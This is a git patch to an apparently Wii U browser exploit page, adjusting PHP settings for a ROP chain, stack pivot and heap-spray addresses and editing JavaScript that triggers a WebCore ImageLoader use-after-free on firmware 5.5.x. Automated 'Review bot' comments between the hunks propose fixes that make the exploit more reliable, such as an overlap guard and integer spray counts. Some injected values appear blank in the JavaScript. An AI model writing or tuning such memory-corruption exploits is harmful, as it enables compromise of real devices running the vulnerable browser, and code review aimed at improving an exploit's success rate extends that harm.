From 005ca5a6926976d83843952994a2927290451c45 Mon Sep 17 00:00:00 2001 From: orboditilt <45944072+orboditilt@users.noreply.github.com> Date: Tue, 8 Jan 2019 16:07:22 +0100 Subject: [PATCH] Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" --- index.php | 38 +++++++++++++++++++++++--------------- 1 file changed, 23 insertions(+), 15 deletions(-) diff --git a/index.php b/index.php index 902320f..158c68d 100644 --- a/index.php +++ b/index.php @@ -10,13 +10,20 @@ function hexentities($str) { // Settings $_REQUEST['sysver'] = '550'; // Currently hardcoded. -$payload_size = 0x8000; -$pivotAdressAdress = 0x1B800000; //r6 -$payload_srcaddr = 0x1D600000; -$ROPHEAP = $payload_srcaddr + 0x800000; -$ROPCHAIN_JS_VAR = 1; +$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary. -$USE_FIXED_PAYLOAD_LEGNTH = 0x400000; // This may be useless, but it worked once.. soo.. +$pivotAdress = 0x010ADDCC; // don't change this. +$payload_size = 0x20000; // the codegen is 128kb max. +$pivotAdressAdress = 0x1B800000; // where does this come from? Seems to be stable with the current spraying + +// These values could be adjusted to increase success rate. +$payload_srcaddr = 0x1D500000 - 0x00A10000; +$payload_spray_size = 0x400000; + +$ROPHEAP = $payload_srcaddr - 0x1000; //+ is a BAD idea as is may override our payload + +$ropchainselect = 1; // Put codebin on heap and search it. +//$ropchainselect = 2; // Put codebin into ROP (Only works with reaaaaaally small payloads. /** Expects a wiiuhaxx_common_cfg.php with the following variables 
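Review bot: `$ROPHEAP = $payload_srcaddr - 0x1000;` leaves only 0x1000 bytes between the ROP heap and the payload, and nothing in this hunk checks that the generated chain fits in that gap, so the "-" form only moves the overwrite the comment warns about to the case where the chain exceeds a page. If `$ROPCHAIN` is laid out upward from `$ROPHEAP` (it is assembled outside this hunk, so I cannot confirm the direction), a guard after it is built, e.g. `if (strlen($ROPCHAIN) > $payload_srcaddr - $ROPHEAP) die('ROP chain overlaps payload');`, turns a silent corruption into a visible failure. `$pivotAdressAdress = 0x1B800000; // where does this come from?` ships a value the author admits is unexplained; reword it as `// empirically stable spray address for sysver 550; not derived, re-verify if the spray changes` so it is not mistaken for a computed constant. `$ropchainselect` is a bare integer switch with no validation here, so a typo falls through silently unless the consumer (outside the hunk) rejects unknown values, and the `//$ropchainselect = 2;` comment has an unclosed parenthesis.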
@@ -38,20 +45,22 @@ Result: Bug is present, crash function UaF(a){ //Warning, the delta was modified ! var delta = 0x0000000; //from 0x0 to 0x04000000 step by 0x01000000 - var pivotAdress = 0x010ADDCC; + var pivotAdress = ; //5.5.2 { - var pivotAdressAdress = 0x1B800000; //r6 - var payloadAdress = 0x1D600000 + delta; + var pivotAdressAdress = ; //r6 + var payloadAdress = + delta; } - var codegenAddress = 0x01800000; - var sizeWebCoreImageLoader = 0x18; - var sprayCount = 0x1900; + var codegenAddress = 0x01800000; // don't change this. + var sizeWebCoreImageLoader = 0x18; // don't change this. + + var payloadsize = ; + var sprayCount = /payloadsize; var _4K = 0x1000; var _16K = 0x4000; var _32K = 0x8000; - + //radio is the *ONLY* type that left the freed WebCore::ImageLoader free ! a.type="radio"; @@ -78,7 +87,6 @@ function UaF(a){ dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent dv.setUint32(0x14, 0x00000000); //padding - // creates "var realROPChain = [...];" @@ -132,4 +140,4 @@ function UaF(a){ } - + \ No newline at end of file
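Review bot: `var sprayCount = /payloadsize;` (the PHP echo supplying the numerator appears stripped in this view, presumably `<?= $payload_spray_size ?>`) is JavaScript floating-point division, so a spray size that is not a multiple of the payload size — which the settings comment explicitly invites the user to tune — yields a fractional spray count for the loop that consumes it. Compute it on the PHP side with `intdiv($payload_spray_size, $payload_size)` or wrap it as `var sprayCount = Math.floor(<?= $payload_spray_size ?> / payloadsize);`. The same applies to `var pivotAdress = ;` and the other injected values: if the PHP variable is unset the emitted script is a syntax error rather than a failed exploit, so a `die()` on missing settings before the JavaScript is emitted would give a clearer failure. The `//5.5.2` label on `pivotAdress` and the hardcoded `sysver = '550'` in the settings block name the same target differently; pick one. UaF continues past the end of this hunk.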